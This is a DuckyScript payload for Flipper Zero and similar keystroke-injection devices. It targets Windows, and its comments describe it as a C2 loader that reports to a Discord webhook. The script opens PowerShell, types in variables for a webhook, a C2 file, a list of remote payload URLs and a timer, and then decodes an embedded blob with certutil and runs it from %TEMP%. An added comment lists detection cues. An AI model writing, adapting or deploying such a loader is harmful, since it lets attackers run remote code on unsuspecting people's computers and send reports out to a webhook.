REM Title: BOOTSTRAP - C2 Payload Loader (pLoader) w Discord Reporting
REM Description: Bootstrap Payload for Remote (C2) Payload Loader with Discord Reporting.
REM This allows the payload to be executed on OMG Basic and other Smaller Devices. All
REM inputs below are needed to start the script, unless you know how to edit the Source. OMG
REM and InfoSecREDD (REDD) are not responsible for the misuse of this Payload. This is
REM for Educational Purposes only.
REM IT IS ADVISED TO EDIT THE MAIN URL TO POINT TO A CUSTOM VERSION WITH YOUR VARIABLES
REM AUTHOR: InfoSecREDD
REM Version: 0.2
REM Category: Execution (REMOTE)
REM Compatibility: Flipper Zero AND DuckyScript Devices
REM Target: Windows
REM To use on a Flipper Zero, comment out (prefix with REM) the DUCKY_LANG US line below
DUCKY_LANG US
DELAY 2000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 2000
REM Put your Discord webhook below.
STRING $webhook = "DiscordWebhookHere";
REM C2 file must be hosted at GitHub unless you can edit the file. 1 = ON and 0 = OFF
STRING $ccontrol = "C2FileHere";
REM Put your Remote List of Payloads below.
STRING $URLS = "URLFileListHere";
REM Put your Timer file below. Valid range is 10-18000; the value is counted in minutes.
STRING $timer = "TimerFileHere";
REM OVERDRIVE - Overdrive allows a payload to execute without waiting for the prior payload to finish. 1 = ON and 0 = OFF
STRING $overdrive = "OverdriveFileHere";
REM Let's run this thing.
REM Defender note: the line below writes an embedded encoded blob (redacted on this page) to
REM %TEMP%\temp.ps1, runs certutil -f -decode to turn it into %TEMP%\l.ps1 (certutil's decode
REM mode expects base64), and then executes that decoded script. The variables typed above are
REM consumed by the decoded script, whose content is not shown here. Detection cues: certutil.exe
REM invoked with -decode from a powershell.exe parent, and a .ps1 file created in %TEMP% and
REM executed moments after a new HID keyboard device was enumerated.
STRING $TempFile = "$env:TEMP\temp.ps1"; $File = "$env:TEMP\l.ps1"; echo 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 > "$TempFile"; certutil -f -decode "$TempFile" "$File" | out-null; & "$env:TEMP\l.ps1"
DELAY 1000
ENTER